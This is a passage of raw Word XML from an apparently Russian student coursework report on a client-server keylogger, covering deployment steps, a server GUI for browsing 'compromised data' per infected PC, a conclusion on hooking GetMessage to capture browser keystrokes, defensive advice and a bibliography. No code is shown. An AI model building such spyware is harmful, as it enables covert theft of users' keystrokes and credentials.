        <w:t xml:space="preserve"> .NET CORE 2.</w:t>
      </w:r>
      <w:r w:rsidRPr="007962C1">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или более поздней версии для работы сервер</w:t>
      </w:r>
      <w:r w:rsidR="003017F3">
        <w:t>а</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003017F3" w:rsidRDefault="00D455ED" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Установ</w:t>
      </w:r>
      <w:r w:rsidR="003017F3">
        <w:t>ка</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003017F3">
        <w:t>.NET Framework 4.</w:t>
      </w:r>
      <w:r w:rsidR="003017F3" w:rsidRPr="007962C1">
        <w:t>6.1</w:t>
      </w:r>
      <w:r w:rsidR="003017F3">
        <w:t xml:space="preserve"> или более поздней версии для работы клиента.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003017F3" w:rsidRDefault="003017F3" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Н</w:t>
      </w:r>
      <w:r w:rsidR="00606007">
        <w:t>астро</w:t>
      </w:r>
      <w:r>
        <w:t>йка</w:t>
      </w:r>
      <w:r w:rsidR="00606007">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D455ED">
        <w:t>обнаружени</w:t>
      </w:r>
      <w:r>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidR="00D455ED">
        <w:t xml:space="preserve"> в локальной сети кли</w:t>
      </w:r>
      <w:r>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidR="00D455ED">
        <w:t>нтского и серверного компьютера</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00460420" w:rsidRDefault="00460420" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Перенос исполняемого файла программы и подключаемых </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="00460420">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>библиотек на компьютер</w:t>
      </w:r>
      <w:r w:rsidRPr="00460420">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00606007" w:rsidRDefault="003017F3" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Установка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="003017F3">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>адреса сервера в к</w:t>
      </w:r>
      <w:r w:rsidR="00606007">
        <w:t>онф</w:t>
      </w:r>
      <w:r>
        <w:t>игурационном</w:t>
      </w:r>
      <w:r w:rsidR="00606007">
        <w:t xml:space="preserve"> файл</w:t>
      </w:r>
      <w:r>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidR="00606007">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00543524" w:rsidRDefault="00543524" w:rsidP="00543524">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GUI</w:t>
      </w:r>
      <w:r w:rsidRPr="00543524">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">предоставляет доступ к мониторингу </w:t>
      </w:r>
      <w:r w:rsidR="00A46E7A">
        <w:t>скомпрометированных</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> данных, к</w:t>
      </w:r>
      <w:r w:rsidR="00754E78">
        <w:t>ак в реальном времени (Рисунок 4</w:t>
      </w:r>
      <w:r>
        <w:t>), так и просмотр данных конкретного ЭВ</w:t>
      </w:r>
      <w:r w:rsidR="00754E78">
        <w:t>М, поиск по источнику (Рисунок 5</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D7D94" w:rsidRDefault="000C46BC" w:rsidP="000C46BC">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="000C46BC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="694553F4" wp14:editId="215268A5">
            <wp:extent cx="5940425" cy="5255260"/>
            <wp:effectExtent l="190500" t="190500" r="193675" b="1930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5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7D94" w:rsidRDefault="00754E78" w:rsidP="004D7D94">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 4</w:t>
      </w:r>
      <w:r w:rsidR="004D7D94">
        <w:t xml:space="preserve"> – Главный экран </w:t>
      </w:r>
      <w:r w:rsidR="00633A23">
        <w:t>приложения сервера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00633A23" w:rsidRPr="00543524" w:rsidRDefault="000C46BC" w:rsidP="000C46BC">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="000C46BC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="759E29DC" wp14:editId="724FE729">
            <wp:extent cx="5940425" cy="2416810"/>
            <wp:effectExtent l="190500" t="190500" r="193675" b="1930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54E78">
        <w:t>Рисунок 5</w:t>
      </w:r>
      <w:r w:rsidR="00633A23">
        <w:t xml:space="preserve"> – поиск по источнику конкретного ЭВМ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F8210B" w:rsidRPr="002B32F4" w:rsidRDefault="00F8210B" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc4724269"/>
      <w:r w:rsidRPr="002B32F4">
        <w:lastRenderedPageBreak/>
        <w:t>Заключение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="00DE662B" w:rsidRDefault="0080020E" w:rsidP="00ED6F1F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 рамках курсовой работы был разработан клавиатурный шпион в виде клиент-серверного приложения. Клиентская часть основана на установке хука (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>hook</w:t>
      </w:r>
      <w:r w:rsidRPr="0080020E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0080020E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 xml:space="preserve">на функцию передачи сообщений </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="0080020E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>GetMessage</w:t>
      </w:r>
      <w:r w:rsidRPr="0080020E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">и перехвата сообщений, исходящих от клавиатуры. Серверная часть основана </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ASP</w:t>
      </w:r>
      <w:r w:rsidRPr="0080020E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>NET</w:t>
      </w:r>
      <w:r w:rsidRPr="0080020E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">в которой представлены </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>WebAPI</w:t>
      </w:r>
      <w:r w:rsidRPr="0080020E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 xml:space="preserve">и веб интерфейс для управления скомпрометированными данными. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0080020E" w:rsidRDefault="0080020E" w:rsidP="00ED6F1F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Клиент устанавливает хук на функцию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>GetMessage</w:t>
      </w:r>
      <w:r w:rsidRPr="0080020E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>перехватывает всю очередь сообщений. После фильтрует полученные данные по активному процессу в системе в данный момент (браузер) и заголовку сайта, отправляет полученные данные на серверную часть.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0080020E" w:rsidRDefault="0080020E" w:rsidP="00ED6F1F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Сервер принимает данные и хранит их в базе данных, разделяя данные для каждого зараженного ПК отдельно. Сервер позволяет анализировать полученные данные: просматривать данные полученные от одного ПК, также производить поиск по заголовку сайта</w:t>
      </w:r>
      <w:r w:rsidR="00C86544">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> с которого украдены данные.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C86544" w:rsidRPr="00C86544" w:rsidRDefault="00C86544" w:rsidP="00ED6F1F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Был изучен принцип работы клавиатурного шпиона использующего системную функцию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>GetMessage</w:t>
      </w:r>
      <w:r w:rsidRPr="00C86544">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C86544" w:rsidRDefault="00C86544" w:rsidP="00ED6F1F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Для того чтобы обезопасить ЭВМ от подобного класса вирусов необходимо:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C86544" w:rsidRPr="00C86544" w:rsidRDefault="00C86544" w:rsidP="00C86544">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86544">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Использовать</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> антивирусное ПО.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F8210B" w:rsidRDefault="00C86544" w:rsidP="00434458">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Использовать класс ПО специализирующийся на безопасности от шпионажа (пример: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Covert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00434458">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F8210B">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009500C9" w:rsidRPr="00285914" w:rsidRDefault="003B41A3" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc4724270"/>
      <w:r w:rsidRPr="00285914">
        <w:lastRenderedPageBreak/>
        <w:t>Литература</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="008C03E2" w:rsidRPr="00A2593F" w:rsidRDefault="00A2593F" w:rsidP="00151271">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="284" w:hanging="284"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A2593F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Campbell Parallel Programming with Microsoft® Visual C++® / Campbell. - </w:t>
      </w:r>
      <w:r w:rsidRPr="00A2593F">
        <w:t>Москва</w:t>
      </w:r>
      <w:r w:rsidRPr="00A2593F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A2593F">
        <w:t>Гостехиздат</w:t>
      </w:r>
      <w:r w:rsidRPr="00A2593F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, 2011. - 784 c.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C03E2" w:rsidRPr="00A2593F" w:rsidRDefault="00A2593F" w:rsidP="00151271">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="284" w:hanging="284"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A2593F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Венц, Кристиан Программирование в ASP.NET Ajax / Кристиан Венц. - М.: Символ-плюс, 2008. - 512 c.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D475EA" w:rsidRPr="008C03E2" w:rsidRDefault="00D475EA" w:rsidP="00151271">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="284" w:hanging="284"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C03E2">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Проскурин В.Г. Защита в операционных системах. – М.: Горячая линия – Телеком, 2016. – 192 с.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D475EA" w:rsidRPr="008C03E2" w:rsidRDefault="00D475EA" w:rsidP="00151271">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:left="284" w:hanging="284"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C03E2">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>https://e.lanbook.com/book/111091</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D475EA" w:rsidRPr="008C03E2" w:rsidRDefault="00D475EA" w:rsidP="00151271">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="284" w:hanging="284"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C03E2">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Рихтер Дж. CLR via C#. Программирование на платформе Microsoft .NET Framework 4.5 на языке C#. 4-е издание. – СПб.: Питер, 2018. – 896 с.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D475EA" w:rsidRPr="00151271" w:rsidRDefault="00D475EA" w:rsidP="00151271">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="284" w:hanging="284"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00151271">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Сафонов В. О. Основы современных операционных систем: учебное пособие. – М.: Национальный Открытый Университет "ИНТУИТ": БИНОМ. Лаборатория знаний, 2011. – 584 с. </w:t>
      </w:r>
      <w:r w:rsidR="00151271" w:rsidRPr="00151271">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[Электронный ресурс]. - URL:</w:t>
      </w:r>
      <w:r w:rsidR="00151271">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="00151271" w:rsidRPr="00151271">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://biblioclub.ru/index.php?page=book_red&amp;id=233210&amp;sr=1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00151271" w:rsidRDefault="00151271" w:rsidP="00151271">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="284" w:hanging="284"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00151271">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Кондратьев, В.К. Операционные системы и оболочки: учебно-практическое пособие / В.К. Кондратьев, О.С. Головина; Международный консорциум «Электронный университет», Московский государственный университет экономики, статистики и информатики, Евразийский открытый институт. - </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00151271">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>М. :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00151271">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Московский государственный университет экономики, статистики и информатики, 2007. - 172 с. - ISBN 5-374-00009-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00151271">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8 ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00151271">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> То же [Электронный ресурс]. - URL:</w:t>
      </w:r>
      <w:r w:rsidR="00D0228A">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00151271">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://biblioclub.ru/index.php?page=book&amp;id=90663</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00151271">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00151271" w:rsidRDefault="00151271" w:rsidP="00151271">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="284" w:hanging="284"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00151271">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Жидков, О.М. Сетевые операционные системы / О.М. Жидков. - </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00151271">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>М. :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00151271">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Лаборатория книги, 2011. - 114 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00151271">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с. :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00151271">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> табл., схем. - ISBN 978-5-504-00184-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00151271">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5 ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00151271">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> То же [Электронный ресурс]. - URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00151271">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://biblioclub.ru/index.php?page=book&amp;id=142238</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00151271">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00151271" w:rsidRPr="00151271" w:rsidRDefault="00151271" w:rsidP="00151271">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="284" w:hanging="284"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00151271">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Белов, Ю.С. Администрирование серверных операционных систем семейства Windows: учебное пособие/ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00151271">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Е.В.Вершинин</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00151271">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, Ю.С. Белов. - М.: Изд-во МГТУ им. Н.Э. Баумана, 2014. - 324с. </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00151271" w:rsidRPr="00151271" w:rsidSect="0043719F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D90" w:rsidRDefault="00705D90" w:rsidP="0043719F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00705D90" w:rsidRDefault="00705D90" w:rsidP="004371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  <w:szCs w:val="28"/>
      </w:rPr>
      <w:id w:val="57131393"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w:rsidR="00D43841" w:rsidRPr="003D7490" w:rsidRDefault="00D43841" w:rsidP="00564871">
        <w:pPr>
          <w:pStyle w:val="af"/>
          <w:ind w:firstLine="0"/>
          <w:jc w:val="center"/>
          <w:rPr>
            <w:rFonts w:cs="Times New Roman"/>
            <w:szCs w:val="28"/>
          </w:rPr>
        </w:pPr>
        <w:r w:rsidRPr="003D7490">
          <w:rPr>
            <w:rFonts w:cs="Times New Roman"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="003D7490">
          <w:rPr>
            <w:rFonts w:cs="Times New Roman"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r w:rsidRPr="003D7490">
          <w:rPr>
            <w:rFonts w:cs="Times New Roman"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00A260A4">
          <w:rPr>
